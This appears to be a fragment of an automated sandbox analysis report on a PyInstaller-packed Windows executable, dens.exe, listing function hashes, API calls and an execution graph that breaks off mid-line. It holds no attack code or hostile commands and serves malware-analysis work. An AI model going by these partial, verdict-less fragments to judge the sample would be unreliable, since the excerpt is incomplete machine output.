                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63517D32A082828EEF748F25984426977E0EB55BA4F144136DE9DC7B85CF7EE491C70A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                              • Instruction ID: 3413cd746f8771c83a11a587361d0f0fd128e84aa27177f6b06a5d54e2988a5f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D121DE72B08B4186EB209B18F84A7EA63A4EB88794F400136EE8D9365ADF3CD245C741
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction ID: d5963c906391e85ea99114f779c0114a698e1561d3d64e507fde88feabfeb877
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61D12972B18E418AEB10CF69D8551EC3771FB147A8B044236DE4ED7B99DE38D02ACB06
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                              • Instruction ID: 676343a545536e242cd7a8e561d9ca1aa7b8748dc7a10c2edd1c8ccda047082e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E11E931A0C14246FE54876EED492B95251FB9CBA0F448030DF4987B9ACE2ED8D18249
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                              • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                              • Instruction ID: e16b7157366fe57095c0bb03f24a9810d1c99c74d3f40d8e6cdd428172d177c9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA412712A0868246FF609B29DC4B37A6761EBA0BB4F144235EE5C87BD5DFBCD4418702
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C109046
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: RtlFreeHeap.NTDLL(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62C0FCBA5), ref: 00007FF62C109064
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                              • API String ID: 3580290477-1397442068
                                                                                                                                                                                                                                              • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                              • Instruction ID: be9582ce97e79338b5047bd0e071fd5532c7b29ea535b0458c94f7403486979f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22418D32A08A4285EF15AF25AC5A0BD63A4EF557F4F554035ED4E87B8ADE3CE4A1C301
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction ID: 8f17ead97d17a737c931a5056be74890f61cb4d4399002a299bd428731deaf78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA41E532B18A8185DB20CF29E8593AA6760FB987A4F444131EE4DC7784EF3CD455CB42
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                              • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                              • Instruction ID: 985ab0652be958d71ff8548b852eba62ebf5bbecd17fd7d44c1f58a28d9b6dfd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6213162B0868181EF208B15D84A22D73B1FB88B94F864035DE8C83684DF7DE9968B42
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction ID: ee375455ade081ab3cff36d53b82a03997399dda6a45a8be90c705f646def659
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B115E32608B8182EF218F19E84025977E5FB88B94F184234DF8D47754DF7DD591C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction ID: 060f8aca37f7101514ec1ade1686fe941e9f572bbcd19a4c234d8adc1b82e3bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8701D421D1860285FF30AF64A86B27E27A0EF58764F800036D98CC2681DF6CD5048B06

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:3.7%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:0.1%
                                                                                                                                                                                                                                              Total number of Nodes:1415
                                                                                                                                                                                                                                              Total number of Limit Nodes:93
                                                                                                                                                                                                                                              execution_graph 68015 7ffdfab811e0 GetSystemInfo 68016 7ffdfab81214 68015->68016 68017 7ff62c109961 68029 7ff62c10a3d8 68017->68029 68019 7ff62c109966 68020 7ff62c1099d7 68019->68020 68021 7ff62c10998d GetModuleHandleW 68019->68021 68022 7ff62c109864 11 API calls 68020->68022 68021->68020 68026 7ff62c10999a 68021->68026 68023 7ff62c109a13 68022->68023 68024 7ff62c109a1a 68023->68024 68025 7ff62c109a30 11 API calls 68023->68025 68027 7ff62c109a2c 68025->68027 68026->68020 68028 7ff62c109a88 GetModuleHandleExW GetProcAddress FreeLibrary 68026->68028 68028->68020 68034 7ff62c10b150 45 API calls 3 library calls 68029->68034 68031 7ff62c10a3e1 68035 7ff62c10a504 45 API calls __FrameHandler3::FrameUnwindToEmptyState 68031->68035 68034->68031 68036 7ff62c105628 68037 7ff62c105642 68036->68037 68038 7ff62c10565f 68036->68038 68087 7ff62c104ee8 11 API calls _get_daylight 68037->68087 68038->68037 68039 7ff62c105672 CreateFileW 68038->68039 68042 7ff62c1056dc 68039->68042 68043 7ff62c1056a6 68039->68043 68041 7ff62c105647 68088 7ff62c104f08 11 API calls _get_daylight 68041->68088 68090 7ff62c105c04 46 API calls 3 library calls 68042->68090 68061 7ff62c10577c GetFileType 68043->68061 68047 7ff62c10564f 68089 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 68047->68089 68049 7ff62c1056e1 68053 7ff62c1056e5 68049->68053 68054 7ff62c105710 68049->68054 68051 7ff62c1056d1 CloseHandle 68057 7ff62c10565a 68051->68057 68052 7ff62c1056bb CloseHandle 68052->68057 68091 7ff62c104e7c 11 API calls 2 library calls 68053->68091 68092 7ff62c1059c4 68054->68092 68060 7ff62c1056ef 68060->68057 68062 7ff62c105887 68061->68062 68063 7ff62c1057ca 68061->68063 68065 7ff62c1058b1 68062->68065 68066 7ff62c10588f 68062->68066 68064 7ff62c1057f6 GetFileInformationByHandle 68063->68064 68110 7ff62c105b00 21 API calls _fread_nolock 68063->68110 68068 7ff62c1058a2 GetLastError 68064->68068 68069 7ff62c10581f 68064->68069 68071 7ff62c1058d4 PeekNamedPipe 68065->68071 68086 7ff62c105872 68065->68086 68066->68068 68070 7ff62c105893 68066->68070 68113 7ff62c104e7c 11 API calls 2 library calls 68068->68113 68073 7ff62c1059c4 51 API calls 68069->68073 68112 7ff62c104f08 11 API calls _get_daylight 68070->68112 68071->68086 68072 7ff62c1057e4 68072->68064 68072->68086 68077 7ff62c10582a 68073->68077 68103 7ff62c105924 68077->68103 68081 7ff62c105924 10 API calls 68082 7ff62c105849 68081->68082 68083 7ff62c105924 10 API calls 68082->68083 68084 7ff62c10585a 68083->68084 68084->68086 68111 7ff62c104f08 11 API calls _get_daylight 68084->68111 68114 7ff62c0fc550 68086->68114 68087->68041 68088->68047 68089->68057 68090->68049 68091->68060 68093 7ff62c1059ec 68092->68093 68094 7ff62c10571d 68093->68094 68125 7ff62c10f724 51 API calls 2 library calls 68093->68125 68102 7ff62c105b00 21 API calls _fread_nolock 68094->68102 68096 7ff62c105a80 68096->68094 68126 7ff62c10f724 51 API calls 2 library calls 68096->68126 68098 7ff62c105a93 68098->68094 68127 7ff62c10f724 51 API calls 2 library calls 68098->68127 68100 7ff62c105aa6 68100->68094 68128 7ff62c10f724 51 API calls 2 library calls 68100->68128 68102->68060 68104 7ff62c105940 68103->68104 68105 7ff62c10594d FileTimeToSystemTime 68103->68105 68104->68105 68107 7ff62c105948 68104->68107 68106 7ff62c105961 SystemTimeToTzSpecificLocalTime 68105->68106 68105->68107 68106->68107 68108 7ff62c0fc550 _log10_special 8 API calls 68107->68108 68109 7ff62c105839 68108->68109 68109->68081 68110->68072 68111->68086 68112->68086 68113->68086 68115 7ff62c0fc559 68114->68115 68116 7ff62c0fc564 68115->68116 68117 7ff62c0fc8e0 IsProcessorFeaturePresent 68115->68117 68116->68051 68116->68052 68118 7ff62c0fc8f8 68117->68118 68123 7ff62c0fcad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 68118->68123 68120 7ff62c0fc90b 68124 7ff62c0fc8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 68120->68124 68123->68120 68125->68096 68126->68098 68127->68100 68128->68094 68129 7ffdfabd2a20 68134 7ffdfabd2a5f 68129->68134 68145 7ffdfabd2e97 68129->68145 68131 7ffdfabd2d56 68132 7ffdfabd2d7e memcpy 68131->68132 68131->68145 68166 7ffdfabc8470 16 API calls new[] 68131->68166 68140 7ffdfabd2daa 68132->68140 68146 7ffdfab76860 68134->68146 68135 7ffdfabd2ede 68136 7ffdfabd2efb 68135->68136 68137 7ffdfabd2f08 68135->68137 68138 7ffdfab76860 16 API calls 68136->68138 68143 7ffdfabd2f06 68137->68143 68153 7ffdfab76920 68137->68153 68138->68143 68140->68135 68141 7ffdfabd2e83 68140->68141 68167 7ffdfab7a490 16 API calls 68141->68167 68143->68143 68144 7ffdfabd2fb9 memcpy 68143->68144 68143->68145 68144->68145 68147 7ffdfab76820 68146->68147 68149 7ffdfab7688d 68147->68149 68168 7ffdfab76160 68147->68168 68149->68131 68151 7ffdfab76845 68151->68131 68154 7ffdfab769d1 68153->68154 68155 7ffdfab7693a 68153->68155 68154->68143 68156 7ffdfab769a8 68155->68156 68157 7ffdfab7694c 68155->68157 68178 7ffdfab765b0 68156->68178 68159 7ffdfab76860 15 API calls 68157->68159 68164 7ffdfab76959 68159->68164 68161 7ffdfab7698a 68161->68143 68163 7ffdfab769c3 68163->68143 68164->68161 68165 7ffdfab7697a memcpy 68164->68165 68165->68161 68166->68132 68167->68145 68169 7ffdfab76179 68168->68169 68170 7ffdfab76220 68168->68170 68169->68170 68173 7ffdfab75b15 malloc 68169->68173 68170->68151 68172 7ffdfab76c20 16 API calls 68170->68172 68172->68151 68174 7ffdfab75b2e 68173->68174 68175 7ffdfab75b42 68173->68175 68177 7ffdfab79330 16 API calls 68174->68177 68175->68170 68177->68175 68180 7ffdfab765c5 68178->68180 68179 7ffdfab765eb 68179->68161 68182 7ffdfab76c20 16 API calls 68179->68182 68180->68179 68183 7ffdfab75b75 realloc 68180->68183 68182->68163 68184 7ffdfab75bb6 68183->68184 68185 7ffdfab75b96 _msize 68183->68185 68184->68179 68187 7ffdfab79330 16 API calls 68185->68187 68187->68184 68188 7ffdfabd0de0 68189 7ffdfabd0e11 68188->68189 68190 7ffdfabd0e0c 68188->68190 68192 7ffdfabd0f14 68189->68192 68198 7ffdfabd0f18 68189->68198 68200 7ffdfabd0f01 68189->68200 68205 7ffdfac0e2c0 18 API calls new[] 68189->68205 68201 7ffdfabf4a80 68190->68201 68193 7ffdfabd0f5a 68192->68193 68194 7ffdfabd0f70 68192->68194 68192->68198 68207 7ffdfab7a490 16 API calls 68193->68207 68208 7ffdfab7a490 16 API calls 68194->68208 68200->68192 68206 7ffdfac10140 21 API calls new[] 68200->68206 68202 7ffdfabf4a99 68201->68202 68204 7ffdfabf4aa5 68201->68204 68209 7ffdfabf49b0 68202->68209 68204->68189 68205->68200 68206->68192 68207->68198 68208->68198 68210 7ffdfabf49ea 68209->68210 68213 7ffdfabf49fa 68209->68213 68215 7ffdfabf44f0 68210->68215 68212 7ffdfabf4a4d 68212->68204 68213->68212 68214 7ffdfabf44f0 99 API calls 68213->68214 68214->68213 68247 7ffdfabf41f0 68215->68247 68217 7ffdfabf45da 68323 7ffdfaca2bc0 68217->68323 68218 7ffdfabf497b 68322 7ffdfabd1350 18 API calls 68218->68322 68223 7ffdfabf45ac 68223->68217 68227 7ffdfabf4698 68223->68227 68230 7ffdfabf467e 68223->68230 68278 7ffdfab93750 68223->68278 68225 7ffdfabf4634 68226 7ffdfabf463a 68225->68226 68225->68227 68228 7ffdfab76860 16 API calls 68226->68228 68226->68230 68229 7ffdfabf473d 68227->68229 68236 7ffdfabf4701 68227->68236 68231 7ffdfabf4667 68228->68231 68232 7ffdfab76860 16 API calls 68229->68232 68230->68217 68230->68218 68321 7ffdfab76c20 16 API calls 68230->68321 68231->68230 68235 7ffdfabf466f memcpy 68231->68235 68239 7ffdfabf4721 68232->68239 68233 7ffdfabf485c 68287 7ffdfab79160 68233->68287 68234 7ffdfabf4816 68237 7ffdfab76860 16 API calls 68234->68237 68235->68230 68236->68233 68236->68234 68236->68239 68237->68239 68239->68230 68320 7ffdfab94b40 69 API calls 68239->68320 68243 7ffdfabf48c7 68244 7ffdfabf48f5 68243->68244 68318 7ffdfabce560 98 API calls 68243->68318 68244->68239 68319 7ffdfabd13e0 18 API calls 68244->68319 68248 7ffdfabf4212 68247->68248 68266 7ffdfabf44a4 68247->68266 68249 7ffdfabf421b 68248->68249 68253 7ffdfabf4233 68248->68253 68368 7ffdfabf40e0 16 API calls 68249->68368 68251 7ffdfabf4226 68251->68223 68254 7ffdfabf4272 68253->68254 68259 7ffdfabf4423 68253->68259 68255 7ffdfabf42c4 68254->68255 68369 7ffdfabf40e0 16 API calls 68254->68369 68332 7ffdfabf4d90 memset 68255->68332 68258 7ffdfabf4333 68260 7ffdfabf4378 68258->68260 68258->68266 68268 7ffdfabf43c2 68258->68268 68259->68266 68391 7ffdfabf40e0 16 API calls 68259->68391 68373 7ffdfab79330 16 API calls 68260->68373 68263 7ffdfabf432b 68370 7ffdfab76c20 16 API calls 68263->68370 68264 7ffdfabf4335 68264->68258 68371 7ffdfac33d30 19 API calls 68264->68371 68265 7ffdfabf4389 68374 7ffdfab79330 16 API calls 68265->68374 68266->68223 68375 7ffdfaba5960 68268->68375 68272 7ffdfabf43ee 68381 7ffdfac32470 68272->68381 68273 7ffdfabf43b3 68273->68223 68274 7ffdfabf4346 68372 7ffdfabf40e0 16 API calls 68274->68372 68277 7ffdfabf4414 68277->68223 68283 7ffdfab93787 68278->68283 68280 7ffdfab937e9 68280->68225 68283->68280 68285 7ffdfab939a5 68283->68285 68554 7ffdfab93330 68283->68554 68568 7ffdfab8a600 10 API calls 68283->68568 68569 7ffdfab93680 17 API calls 68283->68569 68570 7ffdfab87220 50 API calls 68283->68570 68285->68280 68571 7ffdfab8b260 18 API calls new[] 68285->68571 68756 7ffdfab79090 68287->68756 68290 7ffdfabed030 68291 7ffdfabed066 68290->68291 68292 7ffdfabed05d 68290->68292 68291->68292 68309 7ffdfabed0d0 68291->68309 68814 7ffdfab79330 16 API calls 68292->68814 68294 7ffdfabed095 68815 7ffdfab79330 16 API calls 68294->68815 68296 7ffdfabed4dd 68299 7ffdfaba5960 86 API calls 68296->68299 68300 7ffdfabed53d 68296->68300 68297 7ffdfabed0bf 68297->68243 68299->68300 68303 7ffdfabed674 68300->68303 68821 7ffdfac33d30 19 API calls 68300->68821 68303->68243 68305 7ffdfabed66c 68305->68303 68306 7ffdfab76160 new[] 16 API calls 68305->68306 68308 7ffdfabed695 68306->68308 68307 7ffdfab76860 16 API calls 68307->68309 68308->68303 68311 7ffdfabed69d memcpy 68308->68311 68309->68296 68309->68307 68310 7ffdfabed4f1 68309->68310 68315 